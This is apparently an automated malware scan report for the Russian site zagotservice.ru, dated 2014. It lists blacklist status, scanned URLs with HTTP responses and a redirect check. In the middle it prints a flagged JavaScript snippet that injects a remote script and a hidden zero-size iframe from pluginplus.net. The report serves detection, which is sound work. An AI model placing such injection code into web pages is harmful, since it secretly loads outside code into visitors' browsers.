Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zagotservice.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zagotservice.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zagotservice.ru/ | 200 OK Content-Length: 26521 Content-Type: text/html | clean |
http://zagotservice.ru/about | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 09:53:24 GMT Location: / Server: nginx/1.4.7 Content-Length: 0 Content-Type: text/html Set-Cookie: stats=1; expires=Thu, 28-Aug-2014 09:53:24 GMT; path=/; domain=.zagotservice.ru | clean |
http://zagotservice.ru/test404page.js | 404 Not Found Content-Length: 879 Content-Type: text/html | clean |
http://zagotservice.ru/catalog | 200 OK Content-Length: 10678 Content-Type: text/html | clean |
http://zagotservice.ru/price | 200 OK Content-Length: 26460 Content-Type: text/html | clean |
http://zagotservice.ru/news | 200 OK Content-Length: 16139 Content-Type: text/html | clean |
https://pluginplus.net/plugins/system/system_im.js | 200 OK Content-Length: 565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
    var script3 = document.createElement('script');
    script3.type = 'text/javascript';
    document.getElementsByTagName('body')[0].appendChild(script3);
    script3.src = 'https://pluginplus.net/plugins/system_rek.js';
    function statistic_im(){
        var script3 = document.createElement('iframe');
        document.getElementsByTagName('body')[0].appendChild(script3);
        script3.style['width'] = '0px';
        script3.style['height'] = '0px';
        script3.style['border'] = '0px';
        script3.src = 'http://pluginplus.net/plugins/statistic/statistic_im.html';
    }
    statistic_im()
Antivirus reports:
http://c.am15.net/preloader7.js | 200 OK Content-Length: 11226 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/mail | 200 OK Content-Length: 12067 Content-Type: text/html | clean |
https://captcha.megagroup.ru/static/captcha.js?2 | 200 OK Content-Length: 4091 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/shared/misc/calendar.gen.js | 200 OK Content-Length: 1224 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/contacts | 200 OK Content-Length: 16553 Content-Type: text/html | clean |
http://zagotservice.ru/foto | 200 OK Content-Length: 11957 Content-Type: text/html | clean |
http://zagotservice.ru/foto?view=689380 | 200 OK Content-Length: 4032 Content-Type: text/html | clean |
http://zagotservice.ru/shared/highslide-4.1.13/highslide.packed.js | 200 OK Content-Length: 25849 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/shared/flowplayer/flowplayer-3.2.9.min.js | 200 OK Content-Length: 16066 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zagotservice.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate, max-age=0
Connection: close
Date: Thu, 21 Aug 2014 09:53:23 GMT
Pragma: no-cache
Server: nginx/1.4.7
Content-Type: text/html; charset=utf-8
Expires: Mon, 11 Aug 2014 03:58:04 GMT
Last-Modified: Mon, 11 Aug 2014 03:58:04 GMT
Set-Cookie: stats=1; expires=Thu, 28-Aug-2014 09:53:23 GMT; path=/; domain=.zagotservice.ru
Second query (visit from search engine):
GET / HTTP/1.1
Host: zagotservice.ru
Referer: http://www.google.com/search?q=zagotservice.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.